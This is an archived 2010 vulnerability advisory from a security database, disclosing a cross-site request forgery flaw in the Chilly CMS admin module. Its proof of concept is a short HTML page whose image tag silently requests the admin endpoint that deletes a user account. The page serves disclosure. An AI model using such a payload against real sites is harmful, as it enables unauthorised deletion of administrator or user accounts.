Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
WLB
Audyt
RSS
Zespół
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl

Strona główna arrow Baza WLB          

  Tytuł : Chilly CMS cross site request forgery vulnerability
  WLB : WLB-2010030071  (Szczegóły)
  Data publikacji : 2010-03-17
  Autor          : Pratulag
  Poziom ryzyka : Niski  Poziom Niski  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Nie
  Status   : Bład

  Historia :
[2010-03-17] Publikacja

  Podatne oprogramowanie :  

Chilly CMS


  Tekst :  


=======================================================================

chilly_CMS CSRF
Vulnerability


=======================================================================





# Vulnerability found in- Admin module

# email Pratulag@yahoo.com

# company aksitservices

# Credit by Pratul Agrawal

# Software chilly_CMS

# Category CMS / Portals

# Site p4ge
http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php


# Plateform php

# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web
Team)



# Proof of concept #

Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS


Script to Delete the Admin user through Cross Site request forgery

.
...........................................................................
.....................................

<html>

<body>

<img
src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?acti
on=deleteuser&id=[user ID] />

</body>

</html>

.
...........................................................................
.......................................



After execution refresh the page and u can see that a added content is
deleted automatically.


#If you have any questions, comments, or concerns, feel free to contact
me.


  Referencje :  

None


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP


Apache rss
PHP rss
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain

Copyright © SecurityReason. All Rights Reserved.